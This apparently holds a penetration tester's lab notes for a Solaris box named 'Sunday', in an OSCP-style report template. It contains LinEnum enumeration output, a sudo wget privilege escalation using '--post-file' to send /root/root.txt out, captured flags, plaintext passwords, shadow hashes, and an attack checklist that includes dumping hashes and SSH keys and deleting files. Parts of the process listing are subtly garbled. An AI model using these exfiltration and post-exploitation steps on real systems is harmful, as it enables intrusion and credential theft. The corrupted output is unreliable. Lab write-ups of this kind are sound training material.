S 13:29:45 0:00 /usr/lib/sendmail smmsp 603 0.0 0.1 6268 1548 ? S 13:29:45 0:00 /usr/lib/sendmail noaccess 3711 0.0 0.1 230-0 976 ? S 13:41:08 0:00 /usr/sbin/in.finge noaccess 4031 0.0 0.1 2300 976 ? S 13:41:32 0:00 /usr/sbin/in.finge noaccess 4034 0.0 0.1 2300 976 ? S 13:41:32 0:00 /usr/sbin/in.finge noaccess 4156 0.0 0.1 2300 976 ? S 13:41:40 0:00 /usr/sbin/in.finge noaccess 4268 0.0 0.1 2300 976 ? S 13:41:50 0:00 /usr/sbin/in.finge noaccess 4269 0.0 0.1 2300 976 ? S 13:41:50 0:00 /usr/sbin/in.finge noaccess 4288 0.0 0.1 2300 976 ? S 13:41:51 0:00 /usr/sbin/in.finge noaccess 4576 0.0 0.1 2300 976 ? S 13:42:10 0:00 /usr/sbin/in.finge noaccess 4881 0.0 0.1 2300 976 ? S 13:42:35 0:00 /usr/sbin/in.finge noaccess 4919 0.0 0.1 2300 976 ? S 13:42:38 0:00 /usr/sbin/in.finge noaccess 4958 0.0 0.1 2300 976 ? S 13:42:43 0:00 /usr/sbin/in.finge noaccess 6177 0.0 0.1 2300 976 ? S 13:44:28 0:00 /usr/sbin/in.finge noaccess 6216 0.0 0.1 2300 976 ? S 13:44:31 0:00 /usr/sbin/in.finge noaccess. 6253 0.0 0.1 2300 976 ? S 13:44:34 0:00 /usr/sbin/in.finge noaccess 6333 0.0 0.1 2300 976 ? S 13:44:37 0:00 /usr/sbin/in.finge noaccess 6725 0.0 0.1 2300 976 ? S 13:45:06 0:00 /usr/sbin/in.finge noaccess 7182 0.0 0.1 2300 976 ? S 13:45:49 0:00 /usr/sbin/in.finge noaccess 7183 0.0 0.1 2300 976 ? S 13:45:49 0:00 /usr/sbin/in.finge noaccess 7428 0.0 0.1 2300 976 ? S 13:46:06 0:00 /usr/sbin/in.finge noaccess 7600 0.0 0.1 2300 976 ? S 13:46:24 0:00 /usr/sbin/in.finge noaccess 7826 0.0 0.1 2300 976 ? S 13:46:45 0:00 /usr/sbin/in.finge noaccess 8370 0.0 0.1 2300 976 ? S 13:47:42 0:00 /usr/sbin/in.finge noaccess 8601 0.0 0.1 2300 976 ? S 13:48:01 0:00 /usr/sbin/in.finge noaccess 9660 0.0 0.1 2300 976 ? S 13:49:38 0:00 /usr/sbin/in.finge noaccess 9663 0.0 0.1 2300 976 ? S 13:49:38 0:00 /usr/sbin/in.finge noaccess 9749 0.0 0.1 2300 976 ? S 13:49:45 0:00 /usr/sb/in/in.finge noaccess 9920 0.0 0.1 2300 976 ? S 13:50:10 0:00 /usr/sbin/in.finge noaccess 10414 0.0 0.1 2300 976 ? 
S 13:51:04 0:00 /usr/sbin/in.finge noaccess 12014 0.0 0.1 2300 976 ? S 13:53:11 0:00 /usr/sbin/in.finge noaccess 12280 0.0 0.1 2300 976 ? S 13:53:27 0:00 /usr/sbin/in.finge noaccess 12470 0.0 0.1 2300 976 ? S 13:53:41 0:00 /usr/sbin/in.finge noaccess 12552 0.0 0.1 2300 976 ? S 13:53:49 0:00 /usr/sbin/in.finge noaccess 12553 0.0 0.1 2300 976 ? S 13:53:49 0:00 /usr/sbin/in.finge noaccess 12770 0.0 0.1 2300 976 ? S 13:54:03 0:00 /usr/sbin/in.finge noaccess 13311 0.0 0.1 2300 976 ? S 13:54:44 0:00 /usr/sbin/in.finge noaccess 13312 0.0 0.1 2300 976 ? S 13:54:44 0:00 /usr/sbin/in.finge noaccess 13914 0.0 0.1 2300 976 ? S 13:55:26 0:00 /usr/sbin/in.finge noaccess 14212 0.0 0.1 2300 976 ? S 13:55:45 0:00 /usr/sbin/in.finge noaccess 14819 0.0 0.1 2300 976 ? S 130:56:47 0:00 /usr/sbin/in.finge noaccess 14854 0.0 0.1 2300 976 ? S 13:56:48 0:00 /usr/sbin/in.finge noaccess 14857 0.0 0.1 2300 976 ? S 13:56:52 0:00 /usr/sbin/in.finge noaccess 16242 0.0 0.1 2300 976 ? S 13:58:32 0:00 /usr/sbin/in.finge noaccess 16283 0.0 0.1 2300 976 ? S 13:58:37 0:00 /usr/sbin/in.finge noaccess 17653 0.0 0.1 2300 976 ? S 14:00:10 0:00 /usr/sbin/in.finge noaccess 18013 0.0 0.1 2300 976 ? S 14:00:42 0:00 /usr/sbin/in.finge noaccess 19289 0.0 0.1 2300 976 ? S 14:02:40 0:00 /usr/sbin/in.finge noaccess 19290 0.0 0.1 2300 976 ? S 14:02:40 0:00 /usr/sbin/in.finge noaccess 19486 0.0 0.1 2300 976 ? S 14:02:56 0:00 /usr/sbin/in.finge noaccess 19490 0.0 0.1 2300 976 ? S 14:02:56 0:00 /usr/sbin/in.finge noaccess 19580 0.0 0.1 2300 976 ? S 14:03:02 0:00 /usr/sbin/in.finge noaccess 19617 0.0 0.1 2300 976 ? S 14:03:05 0:00 /usr/sbin/in.finge noaccess 19881 0.0 0.1 23010 976 ? S 14:03:28 0:00 /usr/sbin/in.finge noaccess 19882 0.0 0.1 2300 976 ? S 14:03:28 0:00 /usr/sbin/in.finge noaccess 20290 0.0 0.1 2300 976 ? S 14:03:59 0:00 /usr/sbin/in.finge noaccess 20435 0.0 0.1 2300 976 ? S 14:04:10 0:00 /usr/sbin/in.finge noaccess 20741 0.0 0.1 2300 976 ? 
S 14:04:36 0:00 /usr/sbin/in.finge noaccess 21125 0.0 0.1 2300 976 ? S 14:05:06 0:00 /usr/sbin/in.finge noaccess 21369 0.0 0.1 2300 976 ? S 14:05:27 0:00 /usr/sbin/in.finge noaccess 21491 0.0 0.1 2300 976 ? S 14:05:37 0:00 /usr/sbin/in.finge noaccess 21910 0.0 0.1 2300 976 ? S 14:06:10 0:00 /usr/sbin/in.finge noaccess 21975 0.0 0.1 2300 976 ? S 14:06:15 0:00 /usr/sbin/in.finge noaccess 22044 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess 22049 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess 22050 0.0 0.1 2300 976 ? S 14:06:19 0:00 /usr/sbin/in.finge noaccess2 22269 0.0 0.1 2300 976 ? S 14:06:39 0:00 /usr/sbin/in.finge root 24674 0.0 0.2 9316 3180 ? S 14:41:33 0:00 /usr/lib/ssh/sshd root 24874 0.0 0.2 9604 3808 ? S 14:43:17 0:00 /usr/lib/ssh/sshd root 24964 0.0 0.2 9316 3456 ? S 14:43:59 0:00 /usr/lib/ssh/sshd root 25044 0.0 0.2 9316 3332 ? S 14:44:46 0:00 /usr/lib/ssh/sshd root 25070 0.0 0.2 9320 3484 ? S 14:44:59 0:00 /usr/lib/ssh/sshd root 25150 0.0 0.2 9320 3488 ? S 14:45:38 0:00 /usr/lib/ssh/sshd root 25729 0.0 0.2 8116 2856 ? S 15:07:48 0:00 /usr/lib/ssh/sshd sunny 25730 0.0 0.210148 4416 ? 
S 15:07:48 0:00 /usr/lib/ssh/sshd sunny 25737 0.0 0.1 5868 2216 pts/2 S 15:07:57 0:00 -bash sunny 25880 0.0 0.2 6200 2372 pts/2 S 15:12:40 0:00 /bin/bash ./LinEnu sunny 25883 0.0 0.1 4068 964 pts/2 S 15:12:40 0:00 tee -a sunny 26262 0.0 0.1 6260 980 pts/2 S 15:14:30 0:00 /bin/bash ./LinEnu [00;31m[-] Process 3binaries and associated permissions (from above list):[00m 771K -r-xr-xr-x 1 root bin 719K 2009-05-14 21:21 /bin/bash 24K -r-xr-xr-x 1 root bin 24K 2009-05-14 21:18 /lib/crypto/kcfd 44K -r-xr-xr-x 1 root bin 44K 2009-05-14 21:18 /sbin/dlmgmtd 62K -r-xr-xr-x 1 root sys 61K 2009-05-14 21:18 /sbin/init 771K -r-xr-xr-x 1 root bin 719K 2009-05-14 21:21 /usr/bin/bash 24K -r-xr-xr-x 1 root bin 23K 2009-05-14 21:22 /usr/gnu/bin/sleep 259K -r-xr-xr-x 1 root bin 254K 2009-05-14 21:21 /usr/lib/hal/hald 53K -r-xr-xr-x 1 root bin 53K 2009-05-14 21:22 /usr/lib/rmvolmgr 33K -r-xr-xr-x 1 root sys 33K 2009-05-14 21:18 /usr/lib/saf/sac 1.1M -r-xr-sr-x 1 root smmsp 1017K 2009-05-14 21:22 /usr/lib/sendmail 515K -r-xr-xr-x 1 root bin 388K 2009-05-14 21:22 /usr/lib/ssh/sshd 19K -r-xr-xr-x 1 root bin 19K 2009-05-14 21:18 /usr/lib/utmpd 69K -r-xr-xr-x 1 root sys 69K 2009-05-14 21:18 /usr/sbin/cron 259K -r-xr-xr-x 1 root bin 214K 2009-05-14 21:18 /usr/sbin/nscd 62K -r-xr-xr-4x 1 root bin 62K 2009-05-14 21:18 /usr/sbin/rpcbind 87K -r-xr-xr-x 1 root sys 87K 2009-05-14 21:18 /usr/sbin/syslogd /usr/lib/sysevent/: total 99K 1.5K drwxr-xr-x 3 root bin 5 2018-04-15 19:47 . 37K drwxr-xr-x 134 root bin 1.4K 2018-04-15 19:51 .. 1.5K drwxr-xr-x 2 root bin 8 2018-04-15 19:47 modules 24K -r-xr-xr-x 1 root bin 23K 2009-05-14 21:18 syseventconfd 36K -r-xr-xr-x 1 root bin 35K 2009-05-14 21:18 syseventd [00;31m[-] Contents of /etc/inetd.conf:[00m # # CDDL HEADER START # # The contents of this file are subject to the terms of the # Common Development and Distribution License, Version 1.0 only # (the "License"). You may not use this file except in compliance # with the License. 
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2004 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
#ident "%Z%%M% %I% %E% SMI"
#
# Legacy configuration file for inetd(1M). See inetd.conf(4).
#
# This file is no longer directly used to configure inetd.
# The Solaris services which were formerly configured using this file
# are now configured in the Service Management Facility (see smf(5))
# using inetadm(1M).
#
# Any records remaining in this file after installation or upgrade,
# or later created by installing additional software, must be converted
# to smf(5) services and imported into the smf repository using
# inetconv(1M), otherwise the service will not be available. Once
# a service has been converted using inetconv, further changes made to
# its entry here are not reflected in the service.
#

[-] /etc/init.d/ binary permissions:
total 52
drwxr-xr-x 2 root sys 21 2018-04-24 11:02 .
drwxr-xr-x 77 root sys 224 2020-07-17 15:12 ..
-rwxr--r-- 1 root sys 1276 2009-05-14 21:22 acct
-rwxr-xr-x 2 root other 1558 2009-05-14 21:21 autoinstall
-rwxr--r-- 2 root sys 2065 2009-05-14 21:18 cachefs.daemon
-rwxr--r-- 2 root sys 1540 2009-05-14 21:18 deallocate
-rwxr--r-- 1 root sys 1355 2009-05-14 21:18 devlinks
-rwxr--r-- 2 root sys 1010 2009-05-14 21:22 dodatadm.udaplt
-rwxr--r-- 1 root sys 1118 2009-05-14 21:18 drvconfig
-rwxr--r-- 1 root sys 1384 2009-05-14 21:18 ldap.client
-rwxr--r-- 1 root sys 1301 2009-05-14 21:18 mkdtab
-rwxr--r-- 1 root sys 1300 2009-05-14 21:22 nfs.server
-rwxr--r-- 1 root sys 1382 2009-05-14 21:18 nscd
-rwx------ 1 root root 169 2018-04-24 11:23 overwrite
-rwxr--r-- 1 root sys 1209 2009-05-14 21:21 pcmcia
-rwxr--r-- 5 root sys 2546 2009-05-14 21:21 pppd
-rwxr--r-- 2 root sys 1065 2009-05-14 21:18 PRESERVE
-rw-r--r-- 1 root sys 3293 2009-05-14 21:18 README
-rwxr--r-- 1 root sys 1564 2009-05-14 21:22 sendmail
-rwxr--r-- 2 root sys 1614 2009-05-14 21:18 sysetup
-rwxr--r-- 1 root sys 1112 2009-05-14 21:18 ufs_quota

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p17

### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/wget

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root sys 976 2018-04-15 20:18 /etc/passwd
-rw-r--r-- 1 root sys 347 2009-05-14 21:18 /etc/group
-rw-r--r-- 1 root sys 1592 2009-05-14 21:18 /etc/profile
-r-------- 1 root sys 634 2018-04-15 20:18 /etc/shadow

[-] SUID files:
--wsr--r-x 1 root root 0 2018-04-16 01:12 /media/.hal-mtab-lock
-rwsr-xr-x 1 root bin 64436 2009-05-14 21:22 /sbin/wificonfig
-r-sr-xr-x 1 root bin 313848 2009-05-14 21:22 /usr/X11/bin/xscreensaver
-r-sr-xr-x 1 root bin 2251272 2009-05-14 21:21 /usr/X11/bin/amd64/Xorg
-r-sr-xr-x 1 root bin 2001996 2009-05-14 21:21 /usr/X11/bin/i386/Xorg
-rwsr-xr-x 1 root bin 97452 2009-05-14 21:21 /usr/X11/bin/xlock
-r-sr-xr-x 1 root bin 55680 2009-05-14 21:22 /usr/sbin/ping
-r-sr-xr-x 1 root bin 24656 2009-05-14 21:18 /usr/sbin/amd64/whodo
-rwsr-xr-x 1 root sys 33032 2009-05-14 21:18 /usr/sbin/sacadm
-r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/list_devices
-r-sr-xr-x 1 root bin 42504 2009-05-14 21:18 /usr/sbin/traceroute
-r-sr-xr-x 1 root bin 37536 2009-05-14 21:21 /usr/sbin/pmconfig
-r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/deallocate
-r-sr-xr-x 1 root bin 18220 2009-05-14 21:18 /usr/sbin/i86/whodo
-r-sr-xr-x 3 root bin 41448 2009-05-14 21:18 /usr/sbin/allocate
-r-sr-xr-x 1 root bin 29396 2009-05-14 21:21 /usr/xpg4/bin/crontab
-rwsr-xr-x 1 root sys 48044 2009-05-14 21:21 /usr/xpg4/bin/at
-rwsr-xr-x 1 svctag daemon 106804 2009-05-14 21:22 /usr/bin/stclient
-r-sr-xr-x 1 root bin 27240 2009-05-14 21:21 /usr/bin/sys-suspend
-r-sr-xr-x 1 root bin 33736 2009-05-14 21:21 /usr/bin/rsh
-r-sr-xr-x 1 root bin 29376 2009-05-14 21:18 /usr/bin/crontab
-r-sr-xr-x 1 root bin 78696 2009-05-14 21:21 /usr/bin/rdist
-r-s--x--x 2 root bin 173912 2009-05-14 21:22 /usr/bin/sudo
-r-s--x--x 1 root lp 17288 2009-05-14 21:21 /usr/bin/lpset
-r-sr-xr-x 2 root bin 24568 2009-05-14 21:18 /usr/bin/amd64/w
-r-sr-xr-x 2 root bin 24568 2009-05-14 21:18 /usr/bin/amd64/uptime
-r-sr-xr-x 1 root sys 29616 2009-05-14 21:18 /usr/bin/amd64/newtask
-r-sr-xr-x 1 root sys 55332 2009-05-14 21:22 /usr/bin/chkey
-r-sr-xr-x 1 root bin 42624 2009-05-14 21:18 /usr/bin/login
-r-sr-xr-x 1 root bin 18352 2009-05-14 21:18 /usr/bin/pfexec
-rwsr-xr-x 1 root sys 13820 2009-05-14 21:18 /usr/bin/newgrp
-r-sr-xr-x 1 root bin 8392 2009-05-14 21:22 /usr/bin/mailq
-r-sr-xr-x 1 root bin 39464 2009-05-14 21:21 /usr/bin/rlogin
-r-sr-xr-x 1 root bin 257008 2009-05-14 21:21 /usr/bin/pppd
-r-s--x--x 1 uucp bin 70188 2009-05-14 21:18 /usr/bin/tip
-rwsr-xr-x 1 root sys 18860 2009-05-14 21:18 /usr/bin/atq
-r-sr-xr-x 1 root bin 53316 2009-05-14 21:21 /usr/bin/rcp
-r-sr-xr-x 1 root bin 68792 2009-05-14 21:22 /usr/bin/rmformat
-rwsr-xr-x 1 root sys 23320 2009-05-14 21:18 /usr/bin/atrm
-rwsr-xr-x 1 root sys 47924 2009-05-14 21:18 /usr/bin/at
-r-s--x--x 2 root bin 173912 2009-05-14 21:22 /usr/bin/sudoedit
-r-sr-xr-x 1 root bin 39624 2009-05-14 21:18 /usr/bin/fdformat
-r-sr-xr-x 2 root bin 22220 2009-05-14 21:18 /usr/bin/i86/w
-r-sr-xr-x 1 root sys 22872 2009-05-14 21:18 /usr/bin/i86/newtask
-r-sr-xr-x 2 root bin 22220 2009-05-14 21:18 /usr/bin/i86/uptime
-r-sr-sr-x 1 root sys 31584 2009-05-14 21:18 /usr/bin/passwd
-r-sr-xr-x 1 root sys 34896 2009-05-14 21:18 /usr/bin/su
-r-sr-xr-x 1 root bin 13120 2009-05-14 21:18 /usr/lib/utmp_update
-r-s--x--x 1 root bin 44016 2009-05-14 21:22 /usr/lib/print/lpd-port
-r-s--x--x 1 root bin 27744 2009-05-14 21:21 /usr/lib/lp/bin/netpr
-r-sr-xr-x 1 root bin 205204 2009-05-14 21:22 /usr/lib/ssh/ssh-keysign
-rwsr-xr-x 1 root adm 12528 2009-05-14 21:22 /usr/lib/acct/accton
-r-sr-xr-x 1 root bin 111432 2009-05-14 21:18 /usr/lib/fs/ufs/ufsrestore
-r-sr-xr-x 1 root bin 106720 2009-05-14 21:18 /usr/lib/fs/ufs/ufsdump
-r-sr-xr-x 1 root bin 23120 2009-05-14 21:18 /usr/lib/fs/ufs/quota

[-] SGID files:
-rwxr-sr-x 1 root root 240232 2009-05-14 21:21 /usr/X11/bin/lbxproxy
-r-xr-sr-x 1 root root 3331140 2009-05-14 21:22 /usr/X11/bin/Xvnc
-r-xr-sr-x 1 root sys 58560 2009-05-14 21:18 /usr/sbin/amd64/prtconf
-r-xr-sr-x 1 root sys 34904 2009-05-14 21:18 /usr/sbin/amd64/sysdef
-r-xr-sr-x 1 root sys 23576 2009-05-14 21:18 /usr/sbin/amd64/swap
-r-xr-sr-x 1 root tty 18380 2009-05-14 21:18 /usr/sbin/wall
-r-xr-sr-x 1 root sys 27888 2009-05-14 21:18 /usr/sbin/eeprom
-r-xr-sr-x 1 root sys 27856 2009-05-14 21:18 /usr/sbin/i86/sysdef
-r-xr-sr-x 1 root sys 21536 2009-05-14 21:18 /usr/sbin/i86/swap
-r-xr-sr-x 1 root sys 46612 2009-05-14 21:18 /usr/sbin/i86/prtconf
-rwxr-sr-x 1 root sys 13576 2009-05-14 21:18 /usr/sbin/prtdiag
-rwxr-sr-x 1 root slocate 52692 2009-05-14 21:22 /usr/bin/slocate
-r-x--s--x 1 root mail 75708 2009-05-14 21:18 /usr/bin/mail
-r-x--s--x 1 root mail 139176 2009-05-14 21:18 /usr/bin/mailx
-r-xr-sr-x 1 root tty 17948 2009-05-14 21:18 /usr/bin/write
-r-sr-sr-x 1 root sys 31584 2009-05-14 21:18 /usr/bin/passwd
-r-xr-sr-x 1 root smmsp 1041292 2009-05-14 21:22 /usr/lib/sendmail

[-] World-writable files (excluding /proc and /sys):
-rw-rw-rw- 1 root root 0 2020-07-17 13:26 /system/contract/process/template
--w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/1/ctl
--w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/4/ctl
--w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/5/ctl
--w--w--w- 1 root root 0 2020-07-17 13:26 /system/contract/process/7/ctl
-rw-rw-rw- 1 root root 0 2020-07-17 13:26 /system/contract/device/template
-rw-rw-rw- 1 root bin 0 2009-05-14 21:18 /var/adm/spellhist

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root sys 954 2009-05-14 21:22 /etc/sdp.conf
-rw-r--r-- 1 root root 362 2009-05-14 21:22 /etc/updatedb.conf
-rw-r--r-- 1 root bin 1192 2009-05-14 21:21 /etc/hba.conf
-rw-r--r-- 1 root sys 3788 2009-05-14 21:18 /etc/nscd.conf
-rw-r--r-- 1 root sys 2210 2009-05-14 21:18 /etc/logadm.conf
-rw-r--r-- 1 root sys 4222 2009-05-14 21:18 /etc/pam.conf
-rw-r--r-- 1 root sys 1881 2009-05-14 21:22 /etc/nfssec.conf
-rw-r--r-- 1 root bin 1193 2009-05-14 21:21 /etc/ima.conf
-rw-r--r-- 1 root root 22 2018-04-24 12:51 /etc/resolv.conf
-rw-r--r-- 1 root sys 1807 2009-05-14 21:18 /etc/syslog.conf
-rw-r--r-- 1 root sys 411 2018-04-16 15:27 /etc/power.conf
-rw-r--r-- 1 root root 2189 2018-04-23 15:12 /etc/nsswitch.conf
-rw-r--r-- 1 root root 1355 2009-05-14 21:21 /etc/gksu.conf
-rw-r--r-- 1 root sys 3011 2009-05-14 21:18 /etc/dacf.conf
-rw-r--r-- 1 root sys 1111 2009-05-14 21:21 /etc/printers.conf
-rw-r--r-- 1 root bin 1139 2009-05-14 21:21 /etc/mpapi.conf
-rw-r--r-- 1 root sys 368 2009-05-14 21:21 /etc/esd.conf
-rw-r--r-- 1 root other 250 2020-07-17 13:26 /etc/dumpadm.conf

[-] Current user's history files:
-rw------- 1 root root 0 2018-04-24 09:10 /export/home/sunny/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwxrwt 3 root mail 4 2018-04-24 11:05 .
drwxr-xr-x 35 root sys 35 2018-04-15 20:26 ..
-rw-rw---- 1 root mail 2234 2018-04-24 11:05 root
drwxrwxr-x 2 root mail 2 2009-05-14 21:18 :saved

### SCAN COMPLETE ####################################

File System
Writeable Files\Directories
Directory List

Host Information
Operating System
Architecture
Domain
Installed Updates

Script Results

Users & Groups
Users
Groups

Installed Applications
Installed Applications

Running Processes
Process List

Scheduled Jobs
Scheduled Tasks

Network
IPConfig\IFConfig
Network Processes
ARP
DNS
Route

Priv Escalation
Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

Exploit Code Used
sudo wget --post-file=/root/root.txt

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Proof\Flags\Other
Sammy - a3d9498027ca5187ba1793943ee8a598
Root - fb40fab61d99d37536daeec0d97af9b8

Passwords
Sunny - sunday
Sammy - hash = $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
sammy plain = cooldude!

Hashes
/backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Goodies

Log Book

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r
☐ smbtree

Software Versions
Potential Exploits

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopescan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files